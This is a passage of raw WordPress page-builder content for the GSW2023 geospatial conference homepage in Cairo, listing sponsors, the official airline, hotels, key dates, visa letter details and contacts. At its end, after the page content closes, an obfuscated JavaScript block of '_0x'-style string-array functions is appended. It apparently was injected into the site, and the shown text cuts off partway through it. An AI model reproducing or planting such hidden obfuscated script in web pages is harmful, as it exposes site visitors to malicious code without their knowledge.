css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 